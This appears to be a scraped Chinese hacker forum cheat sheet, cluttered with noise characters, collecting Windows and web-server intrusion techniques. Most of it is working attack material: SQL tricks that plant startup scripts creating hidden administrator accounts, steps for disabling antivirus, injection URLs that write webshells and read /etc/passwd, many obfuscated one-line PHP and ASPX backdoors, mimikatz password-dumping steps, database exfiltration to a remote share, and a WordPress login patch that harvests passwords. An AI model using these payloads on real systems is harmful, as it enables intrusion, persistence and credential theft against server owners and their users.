中文版本操作系统中针对mysql添加用户完整代码:( V- R: \3 ?) ?1 n7 h
2 e" q2 v+ g, l& b% [use test;
6 _! a/ n& O- j* t N" Vcreate table a (cmd text);
4 o2 h4 h- n- G1 U5 A; Vinsert into a values ("set wshshell=createobject (""wscript.shell"") " );8 P5 N) d" ^; v X" b
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );6 ~8 y* C" l' U/ s2 |
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
, g' E# }8 |- [) m3 A4 kselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
' B& k$ d8 _# m( [6 R* F1 t5 Pdrop table a;# O9 y, o/ p" {8 c+ _* ?3 I4 E
' w/ p/ K! }7 Q2 T英文版本:
; }% H1 X7 Y9 {6 Q1 u T; W# i0 w3 C8 m6 L2 G" k/ h9 }) K
use test;: L- f3 p6 M: }; Z2 f
create table a (cmd text);
: l$ b! h7 _7 d+ x% cinsert into a values ("set wshshell=createobject (""wscript.shell"") " );+ X' r1 T$ J. x' H: S
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );; `9 F: n# z# }2 _* t$ K( o
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
! ]/ J& S! M- l- ?select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
! @; I+ ^+ U, X0 v# Gdrop table a;
/ M+ Q/ y' q" O8 |4 z( c" H6 ?+ J W$ p2 [- t8 n0 M
create table a (cmd BLOB);
' k& N' A9 F: r3 M( ~insert into a values (CONVERT(木马的16进制代码,CHAR));
( G+ t. r, J2 `$ d2 ^5 Aselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'$ e# I j) l# x1 E( C) |5 L
drop table a;' ~. F/ T4 I$ V
- e! J+ ]/ L1 P' b5 F9 c
记录一下怎么处理变态诺顿( D5 L7 c7 c+ s! t/ f- F- l% @
查看诺顿服务的路径
: d9 Y' n( n9 p) v/ l2 {% Bsc qc ccSetMgr. N" |% v/ ]; t* u6 ?
然后设置权限拒绝访问。做绝一点。。+ w% {1 E9 n6 i& _8 y% z
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
% ?/ S" h# m0 ~" t P5 }cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"1 U& Y2 L1 \! q* d
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
" v. J/ `3 p% P& hcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
# l5 d5 [+ z' h; [
; T; {; f }) a; ~) t6 }0 I然后再重启服务器
6 P' K* x9 r+ x9 y" k$ Ziisreset /reboot w% H0 b) v+ {0 o" d0 m
这样就搞定了。。不过完事后。记得恢复权限。。。。
0 S0 r$ i8 D' k! \. ^6 kcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
/ q7 C7 I, S3 l" _+ Rcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F3 Q8 I5 O3 p, C& l
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
$ r1 K1 D' e/ g: S7 \5 Ycacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F. Q8 I! G3 Z; d
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin u/ S8 o/ T6 V" {" l$ G4 v
. W8 E. }- |5 O3 t3 g" m
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
+ Z8 ]" e1 u3 j6 T' u, A$ C! k) `* H5 u* v& @; o, f4 ^
postgresql注射的一些东西6 z( }7 [9 T* R& g: H3 o
如何获得webshell
7 `) }( K7 F+ q6 jhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
& A7 V" z1 v% A4 [1 Khttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); ; n& E% A6 {' `5 \/ d8 Q9 z
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;# c, F+ d+ c Z L; k4 I
如何读文件2 [' w2 j$ r h; }1 x
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
7 G+ J6 {: q( ~$ l) qhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;! Y: z: R5 A9 K/ E6 W
http://127.0.0.1/postgresql.php?id=1;select * from myfile;) a: H# `# h) d! A2 x/ ^% l( n
5 [ H% E6 R2 f& L
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
8 A/ ~! X( E) `1 X; ^当然,这些的postgresql的数据库版本必须大于8.X
9 y: Y, Q$ ]1 c, f9 \- C7 m" ~创建一个system的函数:/ E# n2 P- A! b" b/ z: i
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
: W7 x1 S; K. r& j3 g, z1 k& g
/ K( c6 i+ ]& ?- s* T; ?6 @9 r# w' o创建一个输出表:2 j& ^6 E3 q0 _5 @- D
CREATE TABLE stdout(id serial, system_out text)6 v( D5 F0 A! c+ E( }2 j- g
/ [; @ ?- f3 B
执行shell,输出到输出表内:
$ H5 ]! W( @1 ] N0 Z; m% KSELECT system('uname -a > /tmp/test')
$ f+ U* [0 K& W' v5 @
: e" i1 k: P/ t( E o1 z! ccopy 输出的内容到表里面;
& e: K4 W) J& W$ ECOPY stdout(system_out) FROM '/tmp/test'2 Y& @) G' u9 t
! M, h& j8 G6 j2 `: P从输出表内读取执行后的回显,判断是否执行成功8 k4 J4 q/ G1 E! N& x
4 l4 K( b' z* h7 vSELECT system_out FROM stdout8 ` Y9 I1 A9 F1 _
下面是测试例子
9 P: c* D! C& \' ?! h ~' u2 W6 V& B& Y; p2 t( E
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- 9 r4 I& M. j* Q$ f. G
: z4 f% W8 [% z' D1 f& ^/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
% `2 X6 P- d; H' S% ]3 mSTRICT --# s2 y1 t2 v3 [
" [9 a& Q# S; W' z k/store.php?id=1; SELECT system('uname -a > /tmp/test') --
% m _7 }0 N' ^ w' Z
& T% ^0 @, Y6 U3 m& j$ r1 Q/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
5 M+ _5 L0 q( O8 a h, S1 G7 s9 v1 A; n6 W" p+ o$ u3 K
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
7 e9 k, B, p6 ^& j" J1 Dnet stop sharedaccess stop the default firewall
; S; `/ s! y4 @: c1 |9 Xnetsh firewall show show/config default firewall
5 m2 Q4 R& v) v& P2 dnetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall" c4 r' @. a$ P
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
/ L+ A" u( Y% U( H. c) h修改3389端口方法(修改后不易被扫出)
! D% e: E* t& X( }5 v' ]5 @修改服务器端的端口设置,注册表有2个地方需要修改; C) A$ B+ Q: \( n7 c, ~* ^
6 _3 z6 u# F' [) b# i4 Z' Y
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
' E$ p& x, e8 y$ Z. L+ |PortNumber值,默认是3389,修改成所希望的端口,比如6000; M8 S6 c5 e, Y9 K( B5 Z0 ^
) J6 Q/ O' s0 r. ^: A8 i5 y
第二个地方:( O$ }- U2 n. o* r% A; X
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 9 i6 L0 d+ ~' {( X. h, @- U- w% |0 S
PortNumber值,默认是3389,修改成所希望的端口,比如6000& ^& ^# o' t) j w8 T5 @" O
, S+ b& p0 W$ n0 K
现在这样就可以了。重启系统就可以了
1 J; c, m4 i% J
* l; F% x) a& x4 t; O! u0 ]& b查看3389远程登录的脚本
$ n( K: R" b. a" q0 `2 n保存为一个bat文件
" B& Y6 W. `* V7 Q. ]. Bdate /t >>D:\sec\TSlog\ts.log3 l. ]4 M7 }0 k( \# h9 S
time /t >>D:\sec\TSlog\ts.log7 e8 m' ]# C0 l7 q- ]8 U9 E# c
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
6 Y# ]* [4 B* j1 jstart Explorer
. z) e" ~* p0 v, c
9 M2 t1 Z6 f0 N- m8 vmstsc的参数:& a$ ^& Y/ |& i' Z
2 F1 c: N# H9 l! n. Y远程桌面连接+ E. N3 j/ n; Y
2 d6 e* m5 Y! TMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
' r x2 Z* n ?! x l8 k7 M [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
3 u6 l6 N: g! w0 V# B1 g
k9 T3 \( |9 z) g. d8 c# m/ a<Connection File> -- 指定连接的 .rdp 文件的名称。! c6 a/ G% H7 o" c, [/ H
5 {/ X! {4 W; C* \( S6 L& F+ N/v:<server[:port]> -- 指定要连接到的终端服务器。
/ x' o6 p8 e" v& n4 N% x) |; X7 w, C ?3 N/ ?* u$ e
/console -- 连接到服务器的控制台会话。
& j6 ]% W& r+ z. t/ o
! |$ O# y; ] x r9 |/f -- 以全屏模式启动客户端。
. n' Q+ h% u$ P( q$ e
! _' x2 K8 n7 V) ~- x/w:<width> -- 指定远程桌面屏幕的宽度。: D' s# t; v1 n% U# E
, | H d$ J/ Z" P4 }
/h:<height> -- 指定远程桌面屏幕的高度。
3 m* U% _% z9 H' g+ V5 ] ?- c% j0 O' ^3 p
/edit -- 打开指定的 .rdp 文件来编辑。7 F4 \* T0 _' Z& J6 l9 }
; @2 A! G3 @, ~6 ~* r7 i2 ~; W/migrate -- 将客户端连接管理器创建的旧版
& S7 [/ Z5 H$ X- ]5 M; P j( K连接文件迁移到新的 .rdp 连接文件。0 D0 y1 U" U" H, i& Y5 v
8 ]4 k6 ]& G# x5 r" ~
}; u' M' ?0 Q+ M# y r% x/ E/ T, o其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就3 |1 y, H" C% d2 N0 l9 d
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
) z7 P6 J. z2 ^; i
: p; r1 [* d) ?4 [, T$ \' ?命令行下开启33891 ^; K' A0 V' x) T7 m! L. K
net user asp.net aspnet /add
) ?8 `7 ?- r6 R$ Z1 k4 n- Anet localgroup Administrators asp.net /add2 M5 ^2 ]3 |* ~; D6 b
net localgroup "Remote Desktop Users" asp.net /add& o* D' r* n* o9 y. o! B0 |
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
3 `. v; ?; q4 y3 J$ M) fecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0! M; C! [9 |! x; j, P
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
; R9 y$ w1 N% N% D: m+ vecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f% }: s9 u7 X$ O& _# s
sc config rasman start= auto1 S' G! R6 j5 d. V/ ^- d$ Z) y
sc config remoteaccess start= auto ?5 A0 [: f X) b$ _; Z9 X
net start rasman$ L- L2 W1 }/ K& ]" ~& a, @/ x8 U
net start remoteaccess2 b! ~$ `: O+ W8 h' q
Media
3 a$ @0 r$ K ?& E; E<form id="frmUpload" enctype="multipart/form-data"
: v, o& I1 T$ K1 aaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
& u3 W H O4 X4 g# @<input type="file" name="NewFile" size="50"><br>9 o: K7 L; \0 k! I, b& P
<input id="btnUpload" type="submit" value="Upload">8 C' u9 L6 I& [- B
</form>
& \0 f( s5 |5 I9 z* |( }7 y- r2 a' E; z% ]
control userpasswords2 查看用户的密码' i/ w4 c% k5 K2 ]
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径: L# q, l' I# t
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a5 a2 w/ p0 {5 \9 O
1 i9 v6 _7 Q8 ~5 v' w
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:, \. {$ x6 `$ B
测试1:
) j9 {$ w7 C# b9 b5 ]: V: kSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t17 {# Y; [$ s. D; _, L
, ^) m! f% T3 s a测试2:3 `1 T3 Y, |- y
. u. w$ R+ e1 _ e5 {
create table dirs(paths varchar(100),paths1 varchar(100), id int). ` C, M; k0 L9 N# l y% C4 Q
+ o$ D& _& [4 u x9 N% l mdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--6 j# d: O2 o/ s
) \: ?* u% o4 g1 `& z% n _3 oSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1) V1 l$ k: C; s) D* F
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令) G; M# b, T5 b6 y
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
) R5 r3 ^8 o: U2 T9 @ vnet stop mcafeeframework
4 q! e& A |% G) ~net stop mcshield! s4 _7 g/ K- x( G) O1 h3 r
net stop mcafeeengineservice
F+ Z0 n0 x" K7 U. D' e1 R8 Ynet stop mctaskmanager- k4 c' o- X5 @- N/ j
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D' u) B8 N4 V: U/ ~
* e; T6 c( o; u/ k2 k VNCDump.zip (4.76 KB, 下载次数: 1)
+ N! A; E2 v( y; q0 O- R" K密码在线破解http://tools88.com/safe/vnc.php) p. Y& Z" t- T1 E: K$ a
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取! M+ R/ P, O8 P. h8 f! @4 d
' J5 O5 V+ J; Jexec master..xp_cmdshell 'net user'
$ V& ]2 m' O: B% imssql执行命令。
; M. a, i( S* y获取mssql的密码hash查询6 x! W4 v' m! F3 q
select name,password from master.dbo.sysxlogins
6 O* L& D! t0 n1 k- j+ {$ L+ u! G- Y
backup log dbName with NO_LOG;
k1 r# {7 m9 x `) I* xbackup log dbName with TRUNCATE_ONLY;
* ], a' A) y+ _! l% _ ADBCC SHRINKDATABASE(dbName);
. a5 Y# X( t8 Z, E4 Hmssql数据库压缩( U2 j. q/ q7 Q
' t# \( Y7 s' s4 O; k1 A
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK$ A5 f3 n0 p' }8 d
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。( y" p, ~) j8 I0 u# o- R
2 I" r, k; z$ J$ Y& ^! l
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
( W: W- \8 ^2 ?; H" U备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
5 E) d( A1 J# z: c" u3 W
3 V' K- S/ \' M. A; ]7 NDiscuz!nt35渗透要点:, U" _7 C9 N, h; q
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
4 G. z; `# Z! g9 d: N8 r(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
5 x3 B3 l, K( u7 p, V7 d( l(3)保存。
# o" r7 M# ?; o(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass( O" ?. l! E \3 O1 d* |& @
d:\rar.exe a -r d:\1.rar d:\website\
9 [+ G9 \* s9 D+ x9 v7 D' d递归压缩website
/ O- r/ D: P, @# i& G注意rar.exe的路径
/ X6 V1 r! l; \; ^8 M
" G4 m/ b! S# z1 u8 ^; o: D<?php q$ e2 O5 _) S9 n! R
+ w, x; F) w& G) q
$telok = "0${@eval($_POST[xxoo])}";
, F' G b! R, D0 i9 Y" u8 s, y1 D
$username = "123456";
8 q' f2 D6 l1 H% f; M+ S) c9 D
1 H7 ]0 u- ?4 K3 S2 k/ I* W$userpwd = "123456";
4 C/ ~0 H* R+ [$ @7 N5 ?3 j* S& }+ y2 c
$telhao = "123456";
; @' s" \2 q: R" C R, ] ~8 v8 |! D) q6 A: n- e
$telinfo = "123456"; _& O" J3 \: F2 t) c
! a" v2 o6 |& Z4 L; T1 F?>% F. O9 b! F" |. i( |0 `% a/ D7 o
php一句话未过滤插入一句话木马. b8 Q } B% L4 X* |0 g6 I
; P' W9 w* d: w7 T' B& O
站库分离脱裤技巧
8 y' b6 B/ e0 s; q- S" Aexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
; S& i! m; a X) dexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
0 o* c: c0 A& H/ x条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。, M6 z* N" u! ~9 l1 f
这儿利用的是马儿的专家模式(自己写代码)。
) N- A5 z. j% [7 Tini_set('display_errors', 1);6 Q5 Y' t# b7 I. {: i+ y
set_time_limit(0);$ }9 k3 h0 C8 R' ^
error_reporting(E_ALL);9 M6 r" z' u! b, L& t% E; _ H+ h
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
% S% \/ ]4 f& Mmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());4 c2 @) [) g9 G" }
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
8 e; t7 l% ~( _4 X# g7 D$i = 0;
5 c1 c+ h& ^5 G0 X, q5 j, O$tmp = '';' Y8 P) \: \- c7 M" E# w# b
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {& A* D8 e% |/ N* o
$i = $i+1;* _" d: G( y7 [7 C
$tmp .= implode("::", $row)."\n";
: Y Y2 `& w( j/ B if(!($i%500)){//500条写入一个文件6 h' Q3 O+ |( S* I3 R
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';4 [9 J* O2 X: j9 B4 ~
file_put_contents($filename,$tmp);
& q6 N" m3 p# C+ Q. H, h $tmp = '';/ I) Y7 y7 J5 J( s0 G
}& {7 i, @! A4 h- R! A" ]
}
5 \' T t- f+ Y2 q* C( T# ~' Smysql_free_result($result);
5 W/ K/ g0 O% X3 b* _8 z
) k* L7 N3 B* Y( `/ @/ H
. r2 ]% e. S- J- d& e
) N6 B8 u( V R0 H$ s$ {1 E) U//down完后delete
' v8 {( K/ H; h4 v2 E9 w, ~2 L ~ k4 L$ b
' [4 _$ T9 w5 L0 F6 u* U
ini_set('display_errors', 1);
6 ?1 F5 B. X4 zerror_reporting(E_ALL);1 T( u3 E$ M7 K f+ u
$i = 0;
: m* y) l; P. N& p1 r+ W+ d, owhile($i<32) {
& `6 B; {0 v, c2 } $i = $i+1;/ m% E" [& @1 T0 K
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
, m* W2 Q2 b) Q1 O0 B3 e/ \3 ^/ } unlink($filename);
/ h9 e6 L8 ]2 p}
/ [9 t0 z g- k5 {httprint 收集操作系统指纹. z3 |$ r0 p* Q
扫描192.168.1.100的所有端口
# T+ J0 a, V* T- D- u. i& e+ cnmap –PN –sT –sV –p0-65535 192.168.1.1009 X" y8 F. y- T
host -t ns www.owasp.org 识别的名称服务器,获取dns信息2 h% x9 ]. d* n/ ]: ]+ z( X2 Z
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
' p( Q/ {* g+ C+ J) PNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host' U; v# p/ C- F7 t) \
6 Y/ e! h* C) L& J3 o
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)/ Z: U6 @/ Q: b. m
- r) j8 q+ p. U" }( R% H MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
$ S; F2 @6 o. D, {& ^
+ }% }* O/ K& c8 a4 H, S: x7 s7 k+ { Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x& C! t) w5 n5 A0 e/ Z* L1 }9 u
+ K x; O& ]5 Y) v
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用). m" h- F5 }3 `3 B( F$ I
1 _9 u) `2 e" l6 z5 o( j; j
http://net-square.com/msnpawn/index.shtml (要求安装)
! ?5 ]! `9 \( ~9 x6 n+ T- R9 {: s; [
/ H. [$ b. U K tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)# V0 y" r0 y& ]2 N# O% o( V6 u7 W" @
7 h/ G& d# e2 U
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
- {" n3 [+ y) g" Y1 |) g/ n D$ |6 Gset names gb2312( @) {9 d, c6 I; Y* Q! B* V) d
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。8 T) ?/ x! c' Y* V& x* O1 m' T
3 Q# X' a7 I: B. lmysql 密码修改0 j S1 B4 t3 t* x& A( `. K/ X% ~
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” 6 {1 V4 S" ?9 K
update user set password=PASSWORD('antian365.com') where user='root';! ?6 K# n, ?5 d" x8 h$ D" o
flush privileges;( q' S* I- g# Z/ S5 H F
高级的PHP一句话木马后门
: r4 a' [% w: B1 P* j
) c7 N; h4 s: E+ w& ?入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀$ x2 u2 n( S. g* m) P' f
/ ?4 `! l3 L/ s' F+ @% m$ f
1、
8 N8 K% j3 S: @/ ?% F( C: n" h, f/ K% G7 K* } [
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";9 H' J7 E; z6 Y: ?
" \3 J% i6 p9 H% f$hh("/[discuz]/e",$_POST['h'],"Access");9 X+ Y) a4 s% k# g/ T0 v1 F
% v) ^6 j& q5 C. o2 [1 P
//菜刀一句话
: p% o! s" C$ G- \: h
6 A! m7 Z# y8 a! m3 f9 z$ N2、# R$ |' p# X+ D- \
8 [ Q' f, v' F _, V
$filename=$_GET['xbid'];; |! `+ Y$ P+ U& ^: W$ \4 z
6 a# U g- W. J( M
include ($filename);
/ H" r" u) j+ z) P5 A2 U6 k! O/ w& B6 I; S# Z. S5 z1 V0 i% a6 [- H$ b7 n
//危险的include函数,直接编译任何文件为php格式运行
5 n) b2 }. l" d2 J: a! c
5 V( N' f8 d8 p3 J+ c7 m3、7 j0 u. p4 t& N8 `* I, p
! Z1 o. f# e& N ?# K, M/ i2 ~$reg="c"."o"."p"."y";
- I/ r) ? @3 p* z- \( D }
# [! z7 T* ]0 Q3 h* C9 X$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
; A6 D' A2 ^% @: m w4 C* U6 o6 h( ~* J% p
//重命名任何文件
3 c% V, d' N/ p% `2 V2 ~# O& p/ A/ B! n* B
4、; m+ s3 C/ ]* T0 t2 m
U+ j+ ?, P$ e" a0 ]! v
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
7 ?& a9 _; M- d3 c1 V1 d& @6 J
$ ]; q/ `. M3 p1 U; b r$gzid("/[discuz]/e",$_POST['h'],"Access");3 ^1 s9 T+ ^' |4 [7 o% J" Y
! Q* N2 r! w2 g. ?1 O2 B5 @) k6 g//菜刀一句话
% K, n7 F, q: u6 _ X$ g8 T9 A! n2 f3 y& y- _& V; G8 q' K0 m8 y( s0 ^
5、include ($uid);
: \; {. f, o& i6 N" U( B8 o) l" J# K! \. f0 x
//危险的include函数,直接编译任何文件为php格式运行,POST
" x6 `" }1 n8 u2 M4 W9 c" l: R
) H* z7 s& q) z0 H2 v1 F% P' C# f* V, q2 R( H
//gif插一句话4 }- G& a- p# y$ {3 ~% i
$ h: a7 ?* D+ @% Z. k6、典型一句话( }" U9 ^! A; P/ t) z, _6 L. O$ f
" c, ~8 G# ]" g0 {8 B; m; l) q
程序后门代码
* s! W/ j! ^ m' I$ {9 Q: M& j9 m H<?php eval_r($_POST[sb])?>
% {/ [4 b/ J: [程序代码$ x+ H7 v F- z, \' Y
<?php @eval_r($_POST[sb])?>: a: Q, t1 ~0 I3 z% b
//容错代码
6 k+ s' t8 M+ }程序代码9 y. y9 J3 p7 U6 P
<?php assert($_POST[sb]);?> Y5 m/ r6 U; k5 c; O% B% l
//使用lanker一句话客户端的专家模式执行相关的php语句
3 h; }. I1 j. C$ y% Z- F L程序代码
, Y* [' a4 p! i1 [<?$_POST['sa']($_POST['sb']);?>
8 }( c3 @9 X2 S1 n1 L/ s3 c1 s程序代码2 s+ O. e8 ?: E$ b7 O. c+ n' I- J
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>$ F" t* I- g1 m/ q- S( O$ l
程序代码/ g3 A1 F, M3 Z- z, c# q6 R
<?php& f: U; Z: U6 N+ N1 m: H
@preg_replace("/[email]/e",$_POST['h'],"error");
, t& g, t- S: q, O* S7 R?>
0 v2 M* H/ {3 i( [! @) D//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
5 G% s) h6 D$ d! F/ H程序代码
% g& [; q- H; W8 @5 t<O>h=@eval_r($_POST[c]);</O>& J* b0 m0 Y1 V0 e% U5 `1 `
程序代码3 G Z, d/ D! v/ L$ u( c0 d
<script language="php">@eval_r($_POST[sb])</script>/ k5 K5 {$ Y- _* o
//绕过<?限制的一句话
: z1 Y$ N& K- K) Y' P% m+ h2 D6 v
1 k) K0 [( }' f( bhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip7 \# ?; [& g' R$ v7 c ?
详细用法:8 j) T4 |' P$ D& f5 o7 c
1、到tools目录。psexec \\127.0.0.1 cmd
7 b# C2 H% }: p% v1 Z2、执行mimikatz
8 ~; T# k" |& Q( b& V- G/ j3、执行 privilege::debug
0 ]: T3 N+ c6 a# Y: w9 {4、执行 inject::process lsass.exe sekurlsa.dll
. Z5 D- U0 r* ^0 Q$ ?8 Q7 R' U5、执行@getLogonPasswords
* c9 b$ @: P. C$ R6、widget就是密码/ J3 c( k* y4 N. n! i
7、exit退出,不要直接关闭否则系统会崩溃。' v. U, ^2 ^% \
/ Z) O/ n* u8 Q& t) Hhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面
8 x& ?* O0 Y- R) E8 \3 f9 C! e8 Z |( V$ M
自动查找系统高危补丁
: X k8 h2 P) ?0 Esysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
, z- r9 g& Z) K( O2 z# V
: A! A3 T, h1 o: C: B5 G突破安全狗的一句话aspx后门
% [! A" q- O1 ^! \% O2 l<%@ Page Language="C#" ValidateRequest="false" %>
6 n8 C! F1 J8 k" j4 m) J! ]: V<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>" [7 ], Q4 g n \/ O
webshell下记录WordPress登陆密码9 R4 x0 r, n" h. y6 N1 p5 z
webshell下记录Wordpress登陆密码方便进一步社工
8 g9 k" V# h! _. ?, y在文件wp-login.php中539行处添加:
8 x% J1 q# g* | ^5 T% [// log password C/ v% J, q! b8 e, J
$log_user=$_POST['log'];8 g- I; F2 S& d0 o7 p8 p
$log_pwd=$_POST['pwd'];. @* m6 j% q r! C
$log_ip=$_SERVER["REMOTE_ADDR"];
3 D. z3 G0 t8 S1 ?2 `$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
; j, h) F" [7 l2 ~7 f" t) [4 X+ F( c) z% ]$txt=$txt.”\r\n”; Z: j) y9 n8 p* }3 s( X6 ?0 X
if($log_user&&$log_pwd&&$log_ip){
# r% W' L5 L2 r: |/ Y, L@fwrite(fopen(‘pwd.txt’,”a+”),$txt);' l/ R& t. W3 p6 e
}
1 t! q1 \5 S& g T当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。* k) S* O1 e4 L4 d7 o
就是搜索case ‘login’4 _3 S. }( M* q; d3 `& ?6 l
在它下面直接插入即可,记录的密码生成在pwd.txt中,
* G# l% k5 O6 K- K: H3 q2 p其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录3 s* G' |" M$ ~- D+ G, e, |
利用II6文件解析漏洞绕过安全狗代码:! e5 g7 V8 P' S1 E0 D! r5 y
